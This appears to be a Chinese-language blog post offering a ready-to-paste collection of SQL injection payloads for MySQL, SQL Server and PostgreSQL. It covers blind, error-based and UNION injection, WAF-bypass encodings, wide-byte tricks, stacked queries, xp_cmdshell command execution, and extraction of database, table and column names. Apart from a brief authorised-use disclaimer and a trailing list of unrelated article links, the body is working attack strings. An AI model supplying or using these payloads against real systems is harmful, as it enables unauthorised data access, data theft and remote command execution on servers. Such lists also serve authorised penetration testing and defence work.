一套定制化高级 payload 合集

目录

[一、通用高阶判断 payload(MySQL 为主)](#一、通用高阶判断 payload(MySQL 为主))

[1. 布尔盲注判断](#1. 布尔盲注判断)

[2. 时间盲注判断](#2. 时间盲注判断)

[3. 报错注入(强制爆错)](#3. 报错注入(强制爆错))

[4. 联合查询基础](#4. 联合查询基础)

[二、绕 WAF / 过滤 高级变形 payload](#二、绕 WAF / 过滤 高级变形 payload)

[1. 注释绕过空格](#1. 注释绕过空格)

[2. 特殊字符替代空格](#2. 特殊字符替代空格)

[3. 大小写混合绕简单规则](#3. 大小写混合绕简单规则)

[4. 等价逻辑绕关键字拦截](#4. 等价逻辑绕关键字拦截)

[5. 宽字节注入(GBK 场景)](#5. 宽字节注入(GBK 场景))

三、堆叠查询(多语句执行)

[四、SQL Server 专用高阶 payload](#四、SQL Server 专用高阶 payload)

[五、PostgreSQL 专用](#五、PostgreSQL 专用)

[六、读取库名 / 表名 / 字段名常用](#六、读取库名 / 表名 / 字段名常用)


先把话放前面:以下 payload 只允许用于你自己有权测试的系统,严禁非法入侵、越权测试,否则后果自负。

我按最通用、实战接口测试 场景,给你一套高级 SQL 注入 payload 合集,直接复制就能用在接口参数里。


一、通用高阶判断 payload(MySQL 为主)

1. 布尔盲注判断

复制代码
1' AND 1=1-- -
1' AND 1=2-- -
1" AND 1=1-- -
1" AND 1=2-- -

2. 时间盲注判断

复制代码
1' AND SLEEP(5)-- -
1' AND IF(1=1,SLEEP(5),0)-- -
1' AND (SELECT SLEEP(5))-- -

3. 报错注入(强制爆错)

复制代码
1' AND UPDATEXML(1,CONCAT(0x7e,VERSION()),1)-- -
1' AND EXTRACTVALUE(1,CONCAT(0x7e,DATABASE()))-- -
1' AND FLOOR(RAND(0)*2) -- -

4. 联合查询基础

复制代码
1' UNION SELECT 1,2,3-- -
1' UNION SELECT NULL,VERSION(),DATABASE()-- -

二、绕 WAF / 过滤 高级变形 payload

1. 注释绕过空格

复制代码
1'UN/**/ION/**/SEL/**/ECT/**/1,DATABASE()-- -

2. 特殊字符替代空格

复制代码
1'%09UNION%09SELECT%091,2,3-- -
1'%0aUNION%0aSELECT%0a1,2,3-- -

3. 大小写混合绕简单规则

复制代码
1' uNiOn sElEcT 1,2,3-- -

4. 等价逻辑绕关键字拦截

复制代码
1' AND 2>1-- -
1' OR 3-2=1-- -

5. 宽字节注入(GBK 场景)

复制代码
%df' OR 1=1-- -
%df' UNION SELECT 1,2-- -

三、堆叠查询(多语句执行)

复制代码
1'; SELECT USER();-- -
1'; SHOW DATABASES();-- -

四、SQL Server 专用高阶 payload

复制代码
1' WAITFOR DELAY '0:0:5'--
1' UNION SELECT @@VERSION,@@SERVERNAME--
1'; EXEC master..xp_cmdshell 'whoami'--

五、PostgreSQL 专用

复制代码
1' AND PG_SLEEP(5)--
1' UNION SELECT VERSION(),CURRENT_USER--

六、读取库名 / 表名 / 字段名常用

复制代码
1' UNION SELECT 1,DATABASE()-- -
1' UNION SELECT 1,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()-- -
1' UNION SELECT 1,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='user'-- -
相关推荐
Mr.Daozhi1 小时前
RAG 进阶实战:跑通 Demo 后我连续翻了 6 次车,逐一修复才真正可用(含 Gradio Web 版)
前端·数据库·langchain·大模型·gradio·rag·科研工具
小程故事多_801 小时前
Claude Code自定义workflow skills用法
数据库·人工智能·智能体
大鹏说大话1 小时前
SQL 排序与分组实战:解决“分组后取最新数据“
android·java·数据库
夏贰四2 小时前
数据建模工具如何筑牢数据根基?数据建模工具怎样落实标准体系?
数据库·数学建模·数据建模工具
程序猿阿伟3 小时前
《一套完整方法论:搞定图形应用的Docker镜像优化》
数据库·docker·容器
二等饼干~za8986683 小时前
geo优化源码开发搭建技术分享
大数据·网络·数据库·人工智能·音视频
数据库小学妹3 小时前
HTAP混合负载架构:如何用一个数据库同时搞定交易和分析
数据库·经验分享·架构·dba
wuxinyan1233 小时前
工业级大模型学习之路029:解决双智能体调用数据库报错问题
数据库·人工智能·python·学习·智能体
Elastic 中国社区官方博客3 小时前
Elastic 线下 Meetup 将于 2026 年 7 月 26 号下午在深圳举行
大数据·数据库·人工智能·elasticsearch·搜索引擎·ai·全文检索
YL200404264 小时前
【Redis实战篇】秒杀实现方案(以优惠券秒杀为例)
数据库·redis